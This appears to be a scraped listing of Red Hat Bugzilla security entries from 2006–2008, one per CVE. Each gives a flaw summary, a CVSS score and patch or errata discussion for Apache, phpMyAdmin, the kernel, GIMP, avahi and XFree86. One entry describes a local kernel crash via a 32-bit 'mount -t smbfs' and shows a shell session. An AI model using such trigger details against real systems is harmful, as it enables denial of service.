This is expected to be included in upstream tk version 8.5.1.
Related issues:
CVE-2006-4484 (gd), CVE-2007-6697 (SDL_image), CVE-2008-0554 (netpbm)
Discussion:
perl-Tk uses embedded copy of tk source code and is affected by this problem
too. Adding perl-Tk maintainers t
Bugzilla
CVE-2007-6203 httpd: Garbage before http method name is not escaped in a reply in case of errorneous request
bugzilla·2007-12-04·CVSS 4.3
CVE-2007-6203 [MEDIUM] CVE-2007-6203 httpd: Garbage before http method name is not escaped in a reply in case of errorneous request
CVE-2007-6203 httpd: Garbage before http method name is not escaped in a reply in case of errorneous request
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-6203 to the following vulnerability:
Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
References:
http://www.securityfocus.com/archive/1/archive/1/484410/100/0/threaded
http://procheckup.com/Vulnerability_PR07-37.php
http://www.securityf
Bugzilla
CVE-2007-5977 XSS in db_create
bugzilla·2007-11-15·CVSS 6.8
CVE-2007-5977 [MEDIUM] CVE-2007-5977 XSS in db_create
CVE-2007-5977 XSS in db_create
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5977 to the following vulnerability:
Cross-site scripting (XSS) vulnerability in db_create.php in phpMyAdmin before 2.11.2.1 allows remote authenticated users with CREATE DATABASE privileges to inject arbitrary web script or HTML via a hex-encoded IMG element in the db parameter in a POST request, a different vulnerability than CVE-2006-6942.
References:
http://www.digitrustgroup.com/advisories/tdg-advisory071108a.html
http://sourceforge.net/project/shownotes.php?release_id=553333
http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2007-7
http://www.frsirt.com/english/advisories/2007/3824
http://secunia.com/advisories/27630
http://xforce.iss.net/xforce/xfdb/38404
Discussion:
d
Bugzilla
CVE-2006-4538 kernel: Local DoS with corrupted ELF
bugzilla·2007-09-13·CVSS 4.9
CVE-2006-4538 [MEDIUM] CVE-2006-4538 kernel: Local DoS with corrupted ELF
CVE-2006-4538 kernel: Local DoS with corrupted ELF
Already fixed for RHEL4, but not for RHEL3/2.1-ia64. See bz#205335 for
EL4 reproducer.
From Kirill Korotaev:
When running on IA64 or SPARC platforms, local users can cause a denial of
service via a malformed ELF file and then triggered by cross-region mappings.
http://lkml.org/lkml/2006/9/4/116
Discussion:
This issue has been addressed in following products:
Red Hat Linux Enterprise 2.1
Red Hat Linux Enterprise 3
Via RHSA-2007:1049 available at https://rhn.redhat.com/errata/RHSA-2007-1049.html and RHSA-2008:0787 available at https://rhn.redhat.com/errata/RHSA-2008-0787.html
Bugzilla
CVE-2006-4519 GIMP multiple image loader integer overflows
bugzilla·2007-07-10·CVSS 6.8
CVE-2006-4519 [MEDIUM] CVE-2006-4519 GIMP multiple image loader integer overflows
CVE-2006-4519 GIMP multiple image loader integer overflows
iDefense has reported several integer overflow flaws in GIMP. It is presumed
that these flaws could lead to arbitrary code execution if a victim opens a
malicious image file.
Discussion:
Reproducers for some of the problems can be found in one of the corresponding
upstream bugs: http://bugzilla.gnome.org/show_bug.cgi?id=453973
---
This was addressed via:
Red Hat Enterprise Linux version 2.1 (RHSA-2007:0513)
Red Hat Enterprise Linux version 3 (RHSA-2007:0513)
Red Hat Enterprise Linux version 4 (RHSA-2007:0513)
Red Hat Enterprise Linux version 5 (RHSA-2007:0513)
Bugzilla
CVE-2006-7203 oops in compat_sys_mount() when data pointer is NULL
bugzilla·2007-05-11·CVSS 4.0
CVE-2006-7203 [MEDIUM] CVE-2006-7203 oops in compat_sys_mount() when data pointer is NULL
CVE-2006-7203 oops in compat_sys_mount() when data pointer is NULL
OpenVZ/Virtuozzo linux kernel team has discovered the following issue on the
latest RHEL5 kernel:
unprivileged user is able to crash the node by running 32-bit "mount -t smbfs ..."
Issue was fixed in mainstream:
http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff_plain;h=822191a2fa1584a29c3224ab328507adcaeac1ab
[test@dhcp0-43 tmp]$ uname -a
Linux dhcp0-43.sw.ru 2.6.18-8.1.3.el5 #1 SMP Mon Apr 16 15:54:14 EDT 2007 x86_64
x86_64 x86_64 GNU/Linux
[test@dhcp0-43 tmp]$ id
uid=502(test) gid=502(test) groups=502(test)
[test@dhcp0-43 tmp]$ file /tmp/mount
/tmp/mount: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for
GNU/Linux 2.2.5, dynamically linked (uses shared libs), for GNU/Linux
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CVE-2006-6899 Bluetooth HID key events injection flaw
bugzilla·2007-02-02·CVSS 5.4
CVE-2006-6899 [MEDIUM] CVE-2006-6899 Bluetooth HID key events injection flaw
CVE-2006-6899 Bluetooth HID key events injection flaw
The hidd allows remote attackers to inject keyboard or mouse events via
unprotected L2CAP PSM 17 and 19. All versions before bluez-utils-2.23 are
affected. The hidd service must be activated to exploit this vulnerability.
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2007-0065.html
Bugzilla
CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
bugzilla·2007-01-11·CVSS 9.3
CVE-2006-5857 [CRITICAL] CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
Adobe informed us of several security vulnerabilities in Adobe Reader 7.0.8 and
earlier. They are releasing Adobe Reader 7.0.9 which fixes these flaws.
Discussion:
Please note that at this time we do not have an update for Adobe Acrobat Reader
on Red Hat Enterprise Linux 3. This is because the binaries supplied by Adobe
now rely on newer versions of libraries than were shipped with Red Hat
Enterprise Linux 3. We are currently working through possible solutions to this
problem.
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
Bugzilla
CVE-2006-6870 Maliciously crafted packed can DoS avahi daemon
bugzilla·2007-01-07·CVSS 5.0
CVE-2006-6870 [MEDIUM] CVE-2006-6870 Maliciously crafted packed can DoS avahi daemon
CVE-2006-6870 Maliciously crafted packed can DoS avahi daemon
+++ This bug was initially created as a clone of Bug #221440 +++
+++ This bug was initially created as a clone of Bug #221439 +++
Description of problem:
Malformed compressed packed can trigger an endless loop
consuming 100% of cpu time upon its reception.
Version-Release number of selected component (if applicable):
FC5 (0.6.11), FC6 (0.6.15), RHEL5 (0.6.15)
Steps to Reproduce:
No reproducer available.
-- Additional comment from [email protected] on 2007-01-04 12:39 EST --
Created an attachment (id=144823)
Upstram patch for avahi Ticket #84 bug
Discussion:
This issue should be resolved in RAWHIDE version (avahi-0.6.16-1.fc7)
Bugzilla
CVE-2006-6870 Maliciously crafted packed can DoS avahi daemon
bugzilla·2007-01-06·CVSS 5.0
CVE-2006-6870 [MEDIUM] CVE-2006-6870 Maliciously crafted packed can DoS avahi daemon
CVE-2006-6870 Maliciously crafted packed can DoS avahi daemon
+++ This bug was initially created as a clone of Bug #221440 +++
+++ This bug was initially created as a clone of Bug #221439 +++
Description of problem:
Malformed compressed packed can trigger an endless loop
consuming 100% of cpu time upon its reception.
Version-Release number of selected component (if applicable):
FC5 (0.6.11), FC6 (0.6.15), RHEL5 (0.6.15)
Steps to Reproduce:
No reproducer available.
-- Additional comment from [email protected] on 2007-01-04 12:39 EST --
Created an attachment (id=144823)
Upstram patch for avahi Ticket #84 bug
Discussion:
Patch resolving this bug was applied in avahi-0.6.11-3.fc5.
Bugzilla
CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
bugzilla·2007-01-05·CVSS 9.3
CVE-2006-5857 [CRITICAL] CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
CVE-2006-5857 Multiple Acrobat vulnerabilities (CVE-2007-0045 CVE-2007-0046)
Adobe informed us of several security vulnerabilities in Adobe Reader 7.0.8 and
earlier. They are releasing Adobe Reader 7.0.9 which fixes these flaws.
Discussion:
These flaws also affect the Adobe Reader shipped with RHEL3.
---
Lifting embargo:
http://www.adobe.com/support/security/bulletins/apsb07-01.html
---
Please note that at this time we do not have an update for Adobe Acrobat Reader
on Red Hat Enterprise Linux 3. This is because the binaries supplied by Adobe
now rely on newer versions of libraries than were shipped with Red Hat
Enterprise Linux 3. We are currently working through possible solutions to this
problem.
---
An advisory has been issued which should help the problem
described in this bug
Bugzilla
CVE-2006-6101 Multiple XFree86 integer overflows (CVE-2006-6102, CVE-2006-6103)
bugzilla·2006-12-07·CVSS 6.6
CVE-2006-6101 [MEDIUM] CVE-2006-6101 Multiple XFree86 integer overflows (CVE-2006-6102, CVE-2006-6103)
CVE-2006-6101 Multiple XFree86 integer overflows (CVE-2006-6102, CVE-2006-6103)
iDefense reported several integer overflow flaws in the XFree86 server source.
These flaws may allow a local user to leverage these flaws to become root.
Discussion:
These flaws also affect RHEL2.1
---
Created attachment 143094
Upstream patch
---
Built as XFree86-4.3.0-114.EL for RHEL3.
RHEL 2.1 is waiting for beehive to wake up.
---
XFree86-4.1.0-78.EL for RHEL 2.1
---
correction, -115 for RHEL3.
---
These issues are public:
http://lists.freedesktop.org/archives/xorg-announce/2007-January/000235.html
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution a
2007-04-12
Published